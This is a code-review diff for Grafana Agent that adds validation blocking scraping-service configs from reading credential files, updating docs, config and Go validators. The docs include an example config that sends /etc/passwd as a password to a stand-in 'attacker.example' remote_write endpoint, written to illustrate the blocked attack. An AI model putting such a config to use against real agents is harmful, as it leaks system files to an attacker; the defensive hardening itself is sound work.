Scraping service: harden security restrictions on instance files #558

Merged · 4 commits · Apr 26, 2021
6 changes: 6 additions & 0 deletions docs/api.md
@@ -108,6 +108,12 @@ defined in the Configuration Reference. The name field of the configuration is
ignored and the name in the URL takes precedence. The request body must be
formatted as YAML.

**WARNING**: By default, all instance configuration files that read
credentials from a file on disk will be rejected. This prevents malicious users
from reading the contents of arbitrary files as passwords and sending their
contents to fake remote_write endpoints. To change the behavior, set
`dangerous_allow_reading_files` to true in the `scraping_service` block.
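As an illustration (the endpoint URL and file path below are hypothetical), an instance config like the following would be rejected by default, because `password_file` causes credentials to be read from disk:

```yaml
remote_write:
  - url: https://attacker.example/api/v1/write
    basic_auth:
      username: agent
      # Reading an arbitrary file (e.g. /etc/passwd) as a password is
      # exactly what this restriction blocks by default.
      password_file: /etc/passwd
```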

Status code: 201 with a new config, 200 on updated config.
Response on success:

26 changes: 18 additions & 8 deletions docs/configuration-reference.md
@@ -243,9 +243,19 @@ agents distribute discovery and scrape load between nodes.
# reshard_interval). A timeout of 0 indicates no timeout.
[reshard_timeout: <duration> | default = "30s"]
# Configuration for the KV store to store configurations.
kvstore: <kvstore_config>
# When set, allows configs pushed to the KV store to specify configuration
# fields that can read secrets from files.
#
# This is disabled by default. When enabled, a malicious user can craft an
# instance config that reads arbitrary files on the machine the Agent runs
# on and sends their contents to a specifically crafted remote_write endpoint.
#
# If enabled, ensure that no untrusted users have access to the Agent API.
[dangerous_allow_reading_files: <boolean> | default = false]
# Configuration for how agents will cluster together.
lifecycler: <lifecycler_config>
```
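For reference, a minimal sketch of enabling the override in the Agent's own config file (the surrounding block layout is assumed from this reference; values are illustrative):

```yaml
prometheus:
  scraping_service:
    enabled: true
    kvstore:
      store: etcd
    # Opt back in to configs that read secrets from files on disk. Only
    # enable this when no untrusted users can reach the Agent API.
    dangerous_allow_reading_files: true
```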
@@ -2045,7 +2055,7 @@ remote_write:
[ sending_queue: <otlpexporter.sending_queue> ]
[ retry_on_failure: <otlpexporter.retry_on_failure> ]

# This processor writes a well formatted log line to a Loki instance for each span, root, or process
# that passes through the Agent. This allows for automatically building a mechanism for trace
# discovery and building metrics from traces using Loki.
automatic_logging:
@@ -2063,7 +2073,7 @@ remote_write:
[ process_attributes: <string array> ]
# timeout on sending logs to Loki
[ timeout: <duration> | default = 1ms ]
overrides:
[ loki_tag: <string> | default = "tempo" ]
[ service_key: <string> | default = "svc" ]
[ span_name_key: <string> | default = "span" ]
@@ -2122,7 +2132,7 @@ tail_sampling:
decision_wait: [ <string> | default="5s" ]
# load_balancing configures load balancing of spans across multiple agents.
# It ensures that all spans of a trace are sampled in the same instance.
# It's not necessary when only one agent is receiving traces (e.g. single instance deployments).
load_balancing:
# resolver configures the resolution strategy for the involved backends
# It can be static, with a fixed list of hostnames, or DNS, with a hostname (and port) that will resolve to all IP addresses.
@@ -2141,22 +2151,22 @@ tail_sampling:
exporter:
# Controls whether compression is enabled.
[ compression: <string> | default = "gzip" | supported = "none", "gzip"]

# Controls whether or not TLS is required. See https://godoc.org/google.golang.org/grpc#WithInsecure
[ insecure: <boolean> | default = false ]

# Disable validation of the server certificate. Only used when insecure is set
# to false.
[ insecure_skip_verify: <bool> | default = false ]

# Sets the `Authorization` header on every trace push with the
# configured username and password.
# password and password_file are mutually exclusive.
basic_auth:
[ username: <string> ]
[ password: <secret> ]
[ password_file: <string> ]

```

### integrations_config
143 changes: 138 additions & 5 deletions pkg/prom/cluster/cluster.go
@@ -14,6 +14,22 @@ import (
"github.com/grafana/agent/pkg/prom/instance/configstore"
"github.com/grafana/agent/pkg/util"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/common/config"
"github.com/prometheus/prometheus/discovery"
"github.com/prometheus/prometheus/discovery/azure"
"github.com/prometheus/prometheus/discovery/consul"
"github.com/prometheus/prometheus/discovery/digitalocean"
"github.com/prometheus/prometheus/discovery/dns"
"github.com/prometheus/prometheus/discovery/dockerswarm"
"github.com/prometheus/prometheus/discovery/ec2"
"github.com/prometheus/prometheus/discovery/eureka"
"github.com/prometheus/prometheus/discovery/hetzner"
"github.com/prometheus/prometheus/discovery/kubernetes"
"github.com/prometheus/prometheus/discovery/marathon"
"github.com/prometheus/prometheus/discovery/openstack"
"github.com/prometheus/prometheus/discovery/scaleway"
"github.com/prometheus/prometheus/discovery/triton"
"github.com/prometheus/prometheus/discovery/zookeeper"
"google.golang.org/grpc"
)

@@ -22,9 +38,9 @@ import (
type Cluster struct {
mut sync.RWMutex

log            log.Logger
cfg            Config
baseValidation ValidationFunc

//
// Internally, Cluster glues together four separate pieces of logic.
@@ -55,7 +71,7 @@ func New(
l = log.With(l, "component", "cluster")

var (
c   = &Cluster{log: l, cfg: cfg, baseValidation: validate}
err error
)

@@ -74,7 +90,7 @@ func New(
if err != nil {
return nil, fmt.Errorf("failed to initialize configstore: %w", err)
}
c.storeAPI = configstore.NewAPI(l, c.store, c.storeValidate)
reg.MustRegister(c.storeAPI)

c.watcher, err = newConfigWatcher(l, cfg, c.store, im, c.node.Owns, validate)
@@ -87,6 +103,123 @@ func New(
return c, nil
}

func (c *Cluster) storeValidate(cfg *instance.Config) error {
c.mut.RLock()
defer c.mut.RUnlock()

if err := c.baseValidation(cfg); err != nil {
return err
}

if c.cfg.DangerousAllowReadingFiles {
return nil
}

// If configs aren't allowed to read files from disk, we need to make sure
// no configs coming in from the API use files for credentials.
for i, rw := range cfg.RemoteWrite {
if err := validateNoFiles(&rw.HTTPClientConfig); err != nil {
return fmt.Errorf("failed to validate remote_write at index %d: %w", i, err)
}
}

for i, sc := range cfg.ScrapeConfigs {
if err := validateNoFiles(&sc.HTTPClientConfig); err != nil {
return fmt.Errorf("failed to validate scrape_config at index %d: %w", i, err)
}

for j, disc := range sc.ServiceDiscoveryConfigs {
if err := validateDiscoveryNoFiles(disc); err != nil {
return fmt.Errorf("failed to validate service discovery at index %d withini scrape_config at index %d: %w", j, i, err)
}
}
}

return nil
}

func validateNoFiles(cfg *config.HTTPClientConfig) error {
checks := []struct {
name string
check func() bool
}{
{"bearer_token_file", func() bool { return cfg.BearerTokenFile != "" }},
{"password_file", func() bool { return cfg.BasicAuth != nil && cfg.BasicAuth.PasswordFile != "" }},
{"credentials_file", func() bool { return cfg.Authorization != nil && cfg.Authorization.CredentialsFile != "" }},
{"ca_file", func() bool { return cfg.TLSConfig.CAFile != "" }},
{"cert_file", func() bool { return cfg.TLSConfig.CertFile != "" }},
{"key_file", func() bool { return cfg.TLSConfig.KeyFile != "" }},
}
for _, check := range checks {
if check.check() {
return fmt.Errorf("%s must be empty unless dangerous_allow_reading_files is set", check.name)
}
}
return nil
}
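
// Usage sketch (illustrative, not part of this diff): validateNoFiles
// rejects any client config that references credentials on disk.
//
//	cfg := &config.HTTPClientConfig{
//		BasicAuth: &config.BasicAuth{PasswordFile: "/etc/secrets/password"},
//	}
//	err := validateNoFiles(cfg)
//	// err: "password_file must be empty unless dangerous_allow_reading_files is set"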

func validateDiscoveryNoFiles(disc discovery.Config) error {
switch d := disc.(type) {
case *azure.SDConfig:
// no-op
case *consul.SDConfig:
if err := validateNoFiles(&config.HTTPClientConfig{TLSConfig: d.TLSConfig}); err != nil {
return err
}
case *digitalocean.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *dns.SDConfig:
// no-op
case *dockerswarm.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *ec2.SDConfig:
// no-op
case *eureka.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *hetzner.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *kubernetes.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *marathon.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
if d.AuthTokenFile != "" {
return fmt.Errorf("auth_token_file must be empty unless dangerous_allow_reading_files is set")
}
case *openstack.SDConfig:
if err := validateNoFiles(&config.HTTPClientConfig{TLSConfig: d.TLSConfig}); err != nil {
return err
}
case *scaleway.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *triton.SDConfig:
if err := validateNoFiles(&config.HTTPClientConfig{TLSConfig: d.TLSConfig}); err != nil {
return err
}
case *zookeeper.NerveSDConfig:
// no-op
case *zookeeper.ServersetSDConfig:
// no-op
default:
return fmt.Errorf("unknown service discovery %s; rejecting config for safety. set dangerous_allow_reading_files to ignore", d.Name())
}

return nil
}

// Reshard implements agentproto.ScrapingServiceServer, and syncs the state of
// configs with the configstore.
func (c *Cluster) Reshard(ctx context.Context, _ *agentproto.ReshardRequest) (*empty.Empty, error) {
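To show how the new validators behave end to end, here is a minimal test sketch (package name and test layout are assumed from the file paths in this diff):

```go
package cluster

import (
	"testing"

	"github.com/prometheus/prometheus/discovery/consul"
)

// A consul SD config whose TLS settings point at files on disk must be
// rejected when dangerous_allow_reading_files is unset.
func TestValidateDiscoveryNoFiles_RejectsCAFile(t *testing.T) {
	sd := &consul.SDConfig{}
	sd.TLSConfig.CAFile = "/etc/ssl/ca.pem"
	if err := validateDiscoveryNoFiles(sd); err == nil {
		t.Fatal("expected error for ca_file, got nil")
	}
}
```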
2 changes: 2 additions & 0 deletions pkg/prom/cluster/config.go
@@ -21,6 +21,8 @@ type Config struct {
KVStore kv.Config `yaml:"kvstore"`
Lifecycler ring.LifecyclerConfig `yaml:"lifecycler"`

DangerousAllowReadingFiles bool `yaml:"dangerous_allow_reading_files"`

// TODO(rfratto): deprecate scraping_service_client in Agent and replace with this.
Client client.Config `yaml:"-"`
}
Expand Down